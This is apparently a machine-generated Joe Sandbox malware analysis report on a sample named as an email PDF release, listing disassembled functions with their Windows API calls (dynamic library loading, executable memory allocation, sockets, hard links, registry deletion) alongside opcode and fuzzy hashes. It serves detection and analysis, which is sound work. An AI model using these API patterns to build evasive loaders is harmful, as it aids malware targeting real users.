                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                          • API String ID: 2574300362-3689287502
                                                                                                          • Opcode ID: c7f02c30bf02e6e5bfdd2cf369d54aab7888ef743bcb5f66755a9a412967ef7d
                                                                                                          • Instruction ID: 194583b4f3b5801daaf861ff3936213204411d44d0503da92112b399aad43a8f
                                                                                                          • Opcode Fuzzy Hash: c7f02c30bf02e6e5bfdd2cf369d54aab7888ef743bcb5f66755a9a412967ef7d
                                                                                                          • Instruction Fuzzy Hash: 4ED0E270512B13CFD720AB71D908646BAF6EF09356B15C83AD896D62A0E6B9D8808A60
                                                                                                          Function 007D0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,007D1039), ref: 007D0DF5
                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007D0E07
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                          • API String ID: 2574300362-4033151799
                                                                                                          • Opcode ID: 157c080b551976348fca220e9c2d12b81ce141c931081c0854c6205152ac6c28
                                                                                                          • Instruction ID: 5beb785640d72db39dbd0a9fd2bc3e1293da6032009a9210a7ba82d4a2a6b638
                                                                                                          • Opcode Fuzzy Hash: 157c080b551976348fca220e9c2d12b81ce141c931081c0854c6205152ac6c28
                                                                                                          • Instruction Fuzzy Hash: 70D08230400326CFD320AF72CC0828A73E9AF00352F00CC2ED4A2C2290E6B9D8908AA4
                                                                                                          Function 007C90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007C8CF4,?,007DF910), ref: 007C90EE
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007C9100
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                          • API String ID: 2574300362-199464113
                                                                                                          • Opcode ID: cbd2da4b079c3f0bc9babc20c909ef9b3ead7db51413c8360b375068b74aeb79
                                                                                                          • Instruction ID: a33bf7a489aafe8e16aff2fce5df26f710613522fc926f80f1a4b3a22ce8adff
                                                                                                          • Opcode Fuzzy Hash: cbd2da4b079c3f0bc9babc20c909ef9b3ead7db51413c8360b375068b74aeb79
                                                                                                          • Instruction Fuzzy Hash: DFD0C770510717CFCB608F30C80DA0273E6AF00381B2AC83FD492C2290EB78C880CAA0
                                                                                                          Function 00791714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime__swprintf
                                                                                                          • String ID: %.3d$WIN_XPe
                                                                                                          • API String ID: 2070861257-2409531811
                                                                                                          • Opcode ID: b709a6d2ef297dfac61365e40985c03b5dda80ea147a13b67788fbdb90168e43
                                                                                                          • Instruction ID: e080e2478e9e0ef54f93585da4c3e435faff0e0bbc0fd160af1ae3894822d885
                                                                                                          • Opcode Fuzzy Hash: b709a6d2ef297dfac61365e40985c03b5dda80ea147a13b67788fbdb90168e43
                                                                                                          • Instruction Fuzzy Hash: BDD0127180510BEACF0096D0AC888F9737CB708701F9044A2F506D2180E26D9764E721
                                                                                                          Function 007A717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 93c0ae50e357456ed23d5767d38b35d594f06d394f1355a14de9f62d7d5ce26a
                                                                                                          • Instruction ID: 57de548e0c586197881b5999cd45e0d19978f54f6b91c8243a6a47146a48b71b
                                                                                                          • Opcode Fuzzy Hash: 93c0ae50e357456ed23d5767d38b35d594f06d394f1355a14de9f62d7d5ce26a
                                                                                                          • Instruction Fuzzy Hash: 7DC16D75A04216EFCB18CFA4C884EAEBBB5FF89314B158698F805DB251D734ED81DB90
                                                                                                          Function 007CE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 007CE0BE
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 007CE101
                                                                                                            • Part of subcall function 007CD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CD7C5
                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007CE301
                                                                                                          • _memmove.LIBCMT ref: 007CE314
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3659485706-0
                                                                                                          • Opcode ID: ee0623772a6a18aab2b48f3525de00d6ec8ef12d80e280b1119ff9eae01bc9a0
                                                                                                          • Instruction ID: 4888563ce1fffdb754f9e7af8b7d93bea031c84cbce18b70d719030c8d708773
                                                                                                          • Opcode Fuzzy Hash: ee0623772a6a18aab2b48f3525de00d6ec8ef12d80e280b1119ff9eae01bc9a0
                                                                                                          • Instruction Fuzzy Hash: C4C16771A08301DFC714DF28C484A6ABBE4FF89314F14896EF8999B351D778E946CB82
                                                                                                          Function 007C8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007C80C3
                                                                                                          • CoUninitialize.OLE32 ref: 007C80CE
                                                                                                            • Part of subcall function 007AD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007AD5D4
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007C80D9
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007C83AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 780911581-0
                                                                                                          • Opcode ID: 951562618e8f690088185ac11ea2859d07ae7e3d5db11f3291746dd5bf6c0e34
                                                                                                          • Instruction ID: f17f2253995128419a89acb1b921fbda3b435c084c9df579e7478175348bdb67
                                                                                                          • Opcode Fuzzy Hash: 951562618e8f690088185ac11ea2859d07ae7e3d5db11f3291746dd5bf6c0e34
                                                                                                          • Instruction Fuzzy Hash: 33A11475604B05DFCB50DF54C889B6AB7E4BF89314F18841DEA969B3A1CB78ED04CB82
                                                                                                          Function 007A687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                                                          • String ID:
                                                                                                          • API String ID: 2808897238-0
                                                                                                          • Opcode ID: 051c4aa161df5b0e7cd9289ce3365417297c6a380d18d3d09c3f0b5cf21d7006
                                                                                                          • Instruction ID: 843bf230b3b4e453811aa33665b3cee7ee8e399a28f3c4dfe7b06d4d1a209276
                                                                                                          • Opcode Fuzzy Hash: 051c4aa161df5b0e7cd9289ce3365417297c6a380d18d3d09c3f0b5cf21d7006
                                                                                                          • Instruction Fuzzy Hash: 3B51F374704301DEDF24AF65C895A7AB3E5AF96310F28C91FE58AEB291DB7CD8808741
                                                                                                          Function 007D97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(00E5DEC8,?), ref: 007D9863
                                                                                                          • ScreenToClient.USER32(00000002,00000002), ref: 007D9896
                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007D9903
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3880355969-0
                                                                                                          • Opcode ID: 45c7a4af1a68e863cdb223b078cb2b046f4808a545df7c718811ba782adbf946
                                                                                                          • Instruction ID: 509dbe659ac04e7baf30544d212f6c9173820605b71c500827f17b66cd95b771
                                                                                                          • Opcode Fuzzy Hash: 45c7a4af1a68e863cdb223b078cb2b046f4808a545df7c718811ba782adbf946
                                                                                                          • Instruction Fuzzy Hash: F2512E34A00209EFCB10CF58C894AAE7BB5FF95760F14816AF9559B3A0D735ED81DB90
                                                                                                          Function 007A9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007A9AD2
                                                                                                          • __itow.LIBCMT ref: 007A9B03
                                                                                                            • Part of subcall function 007A9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007A9DBE
                                                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 007A9B6C
                                                                                                          • __itow.LIBCMT ref: 007A9BC3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$__itow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3379773720-0
                                                                                                          • Opcode ID: 34ee849c6ef4c93103d87e1b59988f9760e28673a804806e4f6b975d9e09f9e5
                                                                                                          • Instruction ID: 29e6a2de9631801563470e08dbe7785c7bdae88f18a67b6b00865cdf3900e3bb
                                                                                                          • Opcode Fuzzy Hash: 34ee849c6ef4c93103d87e1b59988f9760e28673a804806e4f6b975d9e09f9e5
                                                                                                          • Instruction Fuzzy Hash: 3B4183B0A00208EBDF15DF54D849BFE7BB9EF85711F004059FE05A7291DB789958CBA1
                                                                                                          Function 007C69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 007C69D1
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C69E1
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007C6A45
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C6A51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 2214342067-0
                                                                                                          • Opcode ID: d800ed53a8dd3e2c253a62033947e18369c992ea5891ac003aeea9c7853d85f1
                                                                                                          • Instruction ID: 22f0ae3cac96135e71e478c015ffe8215f5dd267e79f80db99ac6e3e5a0d0861
                                                                                                          • Opcode Fuzzy Hash: d800ed53a8dd3e2c253a62033947e18369c992ea5891ac003aeea9c7853d85f1
                                                                                                          • Instruction Fuzzy Hash: 30419275740200EFEB50AF24CC8AF6A77E49B04B14F04C45CFE19AF2D2DAB89D048B55
                                                                                                          Function 007C641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007DF910), ref: 007C64A7
                                                                                                          • _strlen.LIBCMT ref: 007C64D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4218353326-0
                                                                                                          • Opcode ID: 88662cfa1310528a91029b71c35662212940bcdd0f35ef34c66349fe798c9335
                                                                                                          • Instruction ID: 8f373e46f5c59f684c2057c22c0f1845b72b8eade3303dd27a6b3ef52d5c9b88
                                                                                                          • Opcode Fuzzy Hash: 88662cfa1310528a91029b71c35662212940bcdd0f35ef34c66349fe798c9335
                                                                                                          • Instruction Fuzzy Hash: F3419871500104EBCB14EB64ECD9FEEB7A9AF44310F24815DF91A97296DB78AD14CB50
                                                                                                          Function 007BB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007BB89E
                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 007BB8C4
                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007BB8E9
                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007BB915
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3321077145-0
                                                                                                          • Opcode ID: dd847f70695db01d03fbd3f5ec24be4c13edb846608524fa21966b1a410b07a0
                                                                                                          • Instruction ID: 9dca3a93d75b5b5946d4076b21cd0e9644ab484a340c94c70356fd6076eaff6d
                                                                                                          • Opcode Fuzzy Hash: dd847f70695db01d03fbd3f5ec24be4c13edb846608524fa21966b1a410b07a0
                                                                                                          • Instruction Fuzzy Hash: 8E410A35600A14DFCB11EF15C489A9DBBE1AF89310F198099ED4A9B762CB78FD05CB91
                                                                                                          Function 007D8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007D88DE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 634782764-0
                                                                                                          • Opcode ID: a526fbd8f9436dfdd35c8b3085d3bc2915cca729ef09962ede813daf842d42cc
                                                                                                          • Instruction ID: 786b6d1e70222fa2530592f6b05d69e58500560cf83a13df06f8b57b26efbf12
                                                                                                          • Opcode Fuzzy Hash: a526fbd8f9436dfdd35c8b3085d3bc2915cca729ef09962ede813daf842d42cc
                                                                                                          • Instruction Fuzzy Hash: AE31C134610108EFEBA09A58CC55FBD77B5FB05320FA44113FA91E63A1CA79F980A753
                                                                                                          Function 007DAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ClientToScreen.USER32(?,?), ref: 007DAB60
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007DABD6
                                                                                                          • PtInRect.USER32(?,?,007DC014), ref: 007DABE6
                                                                                                          • MessageBeep.USER32(00000000), ref: 007DAC57
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1352109105-0
                                                                                                          • Opcode ID: c78f73b2d09bb27c67f974cbd75bfb65700f5052d166900669c57960f1430697
                                                                                                          • Instruction ID: 657b077ffb64c79522e1dae36ee11f4035e63cde5bbbbcb26baa584b13259df2
                                                                                                          • Opcode Fuzzy Hash: c78f73b2d09bb27c67f974cbd75bfb65700f5052d166900669c57960f1430697
                                                                                                          • Instruction Fuzzy Hash: 10417F70610119EFCB11DF58D884BA97BF5FF49320F1880AAE9199B360D734E941CBA2
                                                                                                          Function 007861C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007861FB
                                                                                                          • __isleadbyte_l.LIBCMT ref: 00786229
                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00786257
                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0078628D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
